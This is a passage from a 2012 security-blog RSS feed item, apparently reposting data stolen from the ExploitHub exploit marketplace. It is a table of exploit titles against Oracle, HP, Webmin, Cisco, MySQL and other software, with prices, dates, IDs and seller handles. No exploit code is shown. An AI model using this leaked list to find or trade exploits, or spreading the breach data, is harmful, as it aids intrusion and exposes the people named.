  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle Jinitiator beans.ocx
  ActiveX Control Stack Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;150.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;23-08-2012 8:49&lt;/td&gt;
  &lt;td class="xl65"&gt;495&lt;/td&gt;
  &lt;td class="xl65"&gt;aushack&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle Business Transaction
  Management FlashTunnelService WriteToFile Code Execution&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;28-08-2012 11:34&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;HP SiteScope SOAP
  getFileInternal Arbitrary File Read&lt;/td&gt;
  &lt;td class="xl66"&gt;25.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;05-09-2012 17:25&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;HP SiteScope SOAP
  loadFileContent Arbitrary File Read&lt;/td&gt;
  &lt;td class="xl66"&gt;25.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;05-09-2012 17:27&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle Outside In XPM Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;25.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;14-09-2012 17:19&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle Solaris Privilege
  Escalation&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;24-10-2012 0:00&lt;/td&gt;
  &lt;td class="xl65"&gt;517&lt;/td&gt;
  &lt;td class="xl65"&gt;unSecurityResearch&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Novell GroupWise Client 8.0.0
  - 2012 - LWP Attachment Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;270.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;04-11-2012 12:57&lt;/td&gt;
  &lt;td class="xl65"&gt;79&lt;/td&gt;
  &lt;td class="xl65"&gt;alino&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;IBM Informix Dynamic Server
  Password Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;19-10-2012 22:31&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;MySQL on Windows Remote system
  Exploit post-auth&lt;/td&gt;
  &lt;td class="xl66"&gt;1500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-11-2012 19:59&lt;/td&gt;
  &lt;td class="xl65"&gt;58&lt;/td&gt;
  &lt;td class="xl65"&gt;Kingcope&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Webmin Status Remote Perl
  Command/Library Execution&lt;/td&gt;
  &lt;td class="xl66"&gt;500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;01-11-2012 3:32&lt;/td&gt;
  &lt;td class="xl65"&gt;423&lt;/td&gt;
  &lt;td class="xl65"&gt;aisg-001&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Webmin Show CGI Remote Command
  Execution&lt;/td&gt;
  &lt;td class="xl66"&gt;500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;01-11-2012 3:47&lt;/td&gt;
  &lt;td class="xl65"&gt;423&lt;/td&gt;
  &lt;td class="xl65"&gt;aisg-001&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Cisco Prime Data Center
  Network Manager Remote Command Execution&lt;/td&gt;
  &lt;td class="xl66"&gt;25.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;05-11-2012 17:24&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;McAfee Web Reporter File
  Upload and Execute&lt;/td&gt;
  &lt;td class="xl66"&gt;25.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;06-11-2012 19:47&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;SGI infosrch.cgi fname Command
  Execution&lt;/td&gt;
  &lt;td class="xl66"&gt;0.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;16-11-2012 19:28&lt;/td&gt;
  &lt;td class="xl65"&gt;528&lt;/td&gt;
  &lt;td class="xl65"&gt;test&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Secure Computing SmartFilter
  File Upload and Execute&lt;/td&gt;
  &lt;td class="xl66"&gt;25.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;12-11-2012 14:21&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;supplementary&lt;/td&gt;
  &lt;td class="xl66"&gt;0.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;17-11-2012 14:35&lt;/td&gt;
  &lt;td class="xl65"&gt;528&lt;/td&gt;
  &lt;td class="xl65"&gt;test&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Site License Plus&lt;/td&gt;
  &lt;td class="xl66"&gt;0.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;19-11-2012 13:33&lt;/td&gt;
  &lt;td class="xl65"&gt;&lt;br /&gt;&lt;/td&gt;
  &lt;td class="xl65"&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;TEST_LIVE&lt;/td&gt;
  &lt;td class="xl66"&gt;0.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;19-11-2012 20:20&lt;/td&gt;
  &lt;td class="xl65"&gt;528&lt;/td&gt;
  &lt;td class="xl65"&gt;test&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Test Product Live #999&lt;/td&gt;
  &lt;td class="xl66"&gt;150.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;21-11-2012 21:59&lt;/td&gt;
  &lt;td class="xl65"&gt;528&lt;/td&gt;
  &lt;td class="xl65"&gt;test&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;XAMPP mssql_connect() Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;25.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;26-11-2012 15:37&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Test Product Live #888&lt;/td&gt;
  &lt;td class="xl66"&gt;80.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;25-11-2012 21:11&lt;/td&gt;
  &lt;td class="xl65"&gt;528&lt;/td&gt;
  &lt;td class="xl65"&gt;test&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Test Product Live #887&lt;/td&gt;
  &lt;td class="xl66"&gt;70.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;25-11-2012 17:27&lt;/td&gt;
  &lt;td class="xl65"&gt;528&lt;/td&gt;
  &lt;td class="xl65"&gt;test&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Test Product Live #885&lt;/td&gt;
  &lt;td class="xl66"&gt;69.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;25-11-2012 18:29&lt;/td&gt;
  &lt;td class="xl65"&gt;528&lt;/td&gt;
  &lt;td class="xl65"&gt;test&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;jose_test&lt;/td&gt;
  &lt;td class="xl66"&gt;0.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;07-12-2012 20:01&lt;/td&gt;
  &lt;td class="xl65"&gt;528&lt;/td&gt;
  &lt;td class="xl65"&gt;test&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Mobile Rifatron DVR web
  version Authentication-free hack&lt;/td&gt;
  &lt;td class="xl66"&gt;0.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;09-12-2012 22:16&lt;/td&gt;
  &lt;td class="xl65"&gt;593&lt;/td&gt;
  &lt;td class="xl65"&gt;Renard&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;MsOfficeWord2010&lt;/td&gt;
  &lt;td class="xl66"&gt;200.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;09-12-2012 18:27&lt;/td&gt;
  &lt;td class="xl65"&gt;471&lt;/td&gt;
  &lt;td class="xl65"&gt;n0ne&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
[+] Salu2
&lt;br /&gt;
[+] Zion3R&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/7_VXZn_ISnE" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-12-15T11:29:12.994-03:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-nM2MlLnBxQk/UMfKy8PvzFI/AAAAAAAABms/WDEZAmq11SU/s72-c/logo_green.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2012/12/inj3ct0r-team-hackea-exploithub-y-roba.html</feedburner:origLink></item><media:rating>nonadult</media:rating></channel></rss>
